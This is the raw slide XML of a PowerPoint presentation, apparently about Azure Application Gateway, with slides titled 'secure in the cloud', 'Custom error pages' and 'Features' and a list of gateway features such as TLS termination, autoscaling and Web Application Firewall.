              <a:t>https://learn.microsoft.com/en-us/azure/application-gateway/custom-error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Inhaltsplatzhalter 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F93F1E0-7C82-C311-FA03-B9CD8F93B629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="email">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6215063" y="3481392"/>
            <a:ext cx="4826000" cy="20526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Inhaltsplatzhalter 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7750103-4CCB-A586-1B61-5B464517D3F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="email">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1092200" y="3481392"/>
            <a:ext cx="4816475" cy="20526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6843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Wattewolke von Miniatur-Holzleitern getragen">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{945BCEC3-E79B-4976-2F2E-474752EAB3B5}"/>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8" name="Titel 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5825A9A3-7D4C-DF26-AFE2-34799B723F5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078992" y="3484971"/>
            <a:ext cx="9284208" cy="1989568"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Todays</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="4000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>topic</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="4000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Textplatzhalter 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3DAEAE8-0633-2FB3-8AC7-9B00853BC1E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1090939" y="5492932"/>
            <a:ext cx="9284208" cy="709906"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>secure in the cloud</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4257694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79F440-CB24-9F2D-CDCA-059256F1B26E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>Custom </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>pages</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Textplatzhalter 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F5749B8-8D52-2512-4428-C0418F8A037C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>403 - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" dirty="0" err="1"/>
              <a:t>Unauthorized</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Textplatzhalter 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A1E53FB-E1A4-F4E2-EDA3-88E6AAA448DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" dirty="0"/>
              <a:t>502 – Bad Gateway</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Inhaltsplatzhalter 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F93F1E0-7C82-C311-FA03-B9CD8F93B629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="email">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6693407" y="3042058"/>
            <a:ext cx="3797576" cy="287695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28" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FDD10C4-B53D-4536-632B-D72B53C20397}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="email">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1818481" y="3048360"/>
            <a:ext cx="2876952" cy="287695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4" name="Textfeld 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D5AB67D-119A-BB8D-A1A4-F0E4F226F3A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="934974" y="6253367"/>
            <a:ext cx="4395978" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.freepik.com/free-vector/403-error-forbidden-with-police-concept-illustration_8030434.htm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Textfeld 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{305F3A1A-7538-FF95-53FB-748340E048EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6097524" y="6253367"/>
            <a:ext cx="5085588" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://www.freepik.com/free-vector/500-internal-server-error-concept-illustration_8030427.htm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="241960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hteck: abgerundete Ecken 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03B9D724-D8A9-86FD-6BFF-5C834CD0B0AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5877760" y="4920562"/>
            <a:ext cx="5305351" cy="51071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
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rechteck: abgerundete Ecken 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16A7191E-FD1A-CEDB-56FE-1F94BE427C94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5877761" y="2898649"/>
            <a:ext cx="5305351" cy="16874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
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rechteck: abgerundete Ecken 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B13085C-66FD-5F7E-7FB6-9FF7C4CA06D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088134" y="4594787"/>
            <a:ext cx="3831337" cy="117296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
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rechteck: abgerundete Ecken 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92351FA4-463D-8C38-67AA-B82A2F144290}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088135" y="3687478"/>
            <a:ext cx="3831337" cy="4424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
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rechteck: abgerundete Ecken 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8098B3D1-C6B1-A341-613E-5531DDC274BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088136" y="2053153"/>
            <a:ext cx="3831336" cy="4424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
        <p:nvSpPr>
          <p:cNvPr id="4" name="Titel 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18BE68A2-5894-A271-5FA9-974899F92CEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Features</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rechteck: abgerundete Ecken 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34B19A50-637A-AEA4-19E1-D1BB89E94CF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2736544" y="257067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3" name="Rechteck: abgerundete Ecken 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A35AA6A9-19DD-97BD-9FF3-0AA3430AB84A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3288994" y="297707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6" name="Rechteck: abgerundete Ecken 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB5CB97F-46EA-CE0B-5672-FD837597A152}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2525571" y="3406492"/>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7" name="Rechteck: abgerundete Ecken 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{575FF611-6821-42A1-31E5-4A1BD1922974}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3962094" y="380257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8" name="Rechteck: abgerundete Ecken 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E7F6749-142A-CF64-4300-2F45D141AE1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4173067" y="4224331"/>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9" name="Rechteck: abgerundete Ecken 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A0C6349-9A80-7F50-5034-1BE16D33EA7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9384994" y="5456605"/>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10" name="Rechteck: abgerundete Ecken 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A01E4A2-5F00-032A-12CD-F2F8DFA2F0B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10559744" y="505352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11" name="Rechteck: abgerundete Ecken 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{957AB2D8-B0B0-AAA1-2494-30480DAEF667}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8381694" y="4628079"/>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12" name="Rechteck: abgerundete Ecken 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00A63DAC-2CEC-69A5-7595-3179C36C4767}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9118294" y="4224331"/>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13" name="Rechteck: abgerundete Ecken 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFCE51C8-E5CB-F32D-E531-7D6CD628A58B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9649919" y="3406492"/>
            <a:ext cx="421946" cy="251515"/>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t>V2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Textfeld 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27FBAD0F-7B47-AA4E-F94D-7BEAD9BEEBA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088134" y="6439064"/>
            <a:ext cx="6094476" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-CH" sz="1000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://learn.microsoft.com/en-us/azure/application-gateway/overview-v2</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Inhaltsplatzhalter 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF657E0C-D3F1-3BD9-E455-795E13ED44AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1088136" y="2112264"/>
            <a:ext cx="9922764" cy="4174236"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr numCol="2">
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TLS and SSL termination</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Autoscaling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Zone redundancy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Static VIP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Application Firewall</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ingress Controller for AKS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URL-based routing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multiple-site hosting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Redirection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session affinity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Websocket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and HTTP/2 traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Connection draining</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Custom error pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rewrite HTTP headers and URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sizing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Azure Key Vault integration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Private Link support</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WAF custom rules and policy associations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mutual Authentication (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mTLS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="72471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6" grpId="0" animBg="1"/>
      <p:bldP spid="15" grpId="0" animBg="1"/>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descr="Person, die gelben Koffer packt">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FB65F6A-B11E-563C-2AD2-F58AF9C5B00D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2" cstate="email">
            <a:alphaModFix/>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 name="Titel 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7722834-6892-3621-3885-2B24572837EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1059319" y="2223018"/>
            <a:ext cx="5576374" cy="931243"/>
          </a:xfrm>
          <a:solidFill>
            <a:srgbClr val="0D0D0D">
              <a:alpha val="60000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" cap="all" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Takeaways</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
